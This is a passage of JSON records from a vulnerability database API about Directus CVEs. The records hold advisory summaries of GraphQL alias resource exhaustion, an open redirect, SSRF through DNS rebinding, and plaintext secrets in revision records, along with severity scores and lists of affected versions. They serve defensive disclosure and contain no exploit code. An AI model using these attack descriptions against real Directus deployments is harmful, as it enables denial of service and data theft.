"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13", "reference_id": "logger.ts#L13", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/380863?format=api", "purl": "pkg:npm/directus@9.23.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3" } ], "aliases": [ "CVE-2023-28443", "GHSA-8vg2-wf3q-mwv7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b8ya-2bmn-e3h5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71751?format=api", "vulnerability_id": "VCID-bc42-4j4d-tudj", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35441", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02996", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02984", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04343", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04344", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35441" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35441", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35441" }, { "reference_url": "https://github.com/advisories/GHSA-ph52-67fq-75wj", "reference_id": "GHSA-ph52-67fq-75wj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ph52-67fq-75wj" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj", "reference_id": "GHSA-ph52-67fq-75wj", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35441", "GHSA-ph52-67fq-75wj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bc42-4j4d-tudj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71608?format=api", "vulnerability_id": "VCID-bg96-h5bt-xfbb", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus is vulnerable to an open redirect via the redirect query parameter on the /admin/tfa-setup page. When an administrator who has not yet configured Two-Factor Authentication (2FA) visits a crafted URL, they are presented with the legitimate Directus 2FA setup page. After completing the setup process, the application redirects the user to the attacker-controlled URL specified in the redirect parameter without any validation. This vulnerability could be used in phishing attacks targeting Directus administrators, as the initial interaction occurs on a trusted domain. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35411", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05334", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05352", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08275", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08276", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35411" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35411", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35411" }, { "reference_url": "https://github.com/advisories/GHSA-q75c-4gmv-mg9x", "reference_id": "GHSA-q75c-4gmv-mg9x", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q75c-4gmv-mg9x" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x", "reference_id": "GHSA-q75c-4gmv-mg9x", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35411", "GHSA-q75c-4gmv-mg9x" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bg96-h5bt-xfbb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/135972?format=api", "vulnerability_id": "VCID-bsua-aktm-1qfd", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An attacker can bypass the security controls by performing a DNS rebinding attack and view sensitive data from internal servers or perform a local port scan. An attacker can exploit this vulnerability to access highly sensitive internal server(s) and steal sensitive information. This issue was fixed in version 9.23.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-26492", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46047", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46033", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45895", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.4604", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-26492" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26492", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26492" }, { "reference_url": "https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff", "reference_id": "ff53d3e69a602d05342e15d9bb616884833ddbff", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff" }, { "reference_url": "https://github.com/advisories/GHSA-j3rg-3rgm-537h", "reference_id": "GHSA-j3rg-3rgm-537h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j3rg-3rgm-537h" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h", "reference_id": "GHSA-j3rg-3rgm-537h", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.23.0", "reference_id": "v9.23.0", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.23.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32456?format=api", "purl": "pkg:npm/directus@9.23.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-f3pv-2cf5-3bg8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/393033?format=api", "purl": "pkg:npm/directus@9.23.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1" } ], "aliases": [ "CVE-2023-26492", "GHSA-j3rg-3rgm-537h" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bsua-aktm-1qfd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105701?format=api", "vulnerability_id": "VCID-c4eu-udp3-uuen", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows to handle CRUD events for users it is possible to log the incoming data to console using the \"Log to Console\" operation and a template string. Malicious admins can log sensitive data from other users when they are created or updated. Version 11.9.0 contains a fix for the issue. As a workaround, avoid logging sensitive data to the console outside the context of development.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53885", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28985", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28979", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28999", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28778", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53885" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53885", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53885" }, { "reference_url": "https://github.com/directus/directus/pull/25355", "reference_id": "25355", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/pull/25355" }, { "reference_url": "https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5", "reference_id": "859f664f56fb50401c407b095889cea38ff580e5", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5" }, { "reference_url": "https://github.com/advisories/GHSA-x3vm-88hf-gpxp", "reference_id": "GHSA-x3vm-88hf-gpxp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x3vm-88hf-gpxp" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-x3vm-88hf-gpxp", "reference_id": "GHSA-x3vm-88hf-gpxp", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-x3vm-88hf-gpxp" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53885", "GHSA-x3vm-88hf-gpxp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4eu-udp3-uuen" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/72964?format=api", "vulnerability_id": "VCID-d8vm-nuff-uffc", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. Due to the revision snapshot code not consistently calling the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39943", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09802", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09788", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.0975", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.098", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39943" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39943", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39943" }, { "reference_url": "https://github.com/advisories/GHSA-mvv8-v4jj-g47j", "reference_id": "GHSA-mvv8-v4jj-g47j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mvv8-v4jj-g47j" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j", "reference_id": "GHSA-mvv8-v4jj-g47j", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.17.0", "reference_id": "v11.17.0", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.17.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-39943", "GHSA-mvv8-v4jj-g47j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d8vm-nuff-uffc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89728?format=api", "vulnerability_id": "VCID-dcw5-6ct3-b3ev", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0-alpha.4 and prior to version 11.5.0, the `search` query parameter allows users with access to a collection to filter items based on fields they do not have permission to view. This allows the enumeration of unknown field contents. The searchable columns (numbers & strings) are not checked 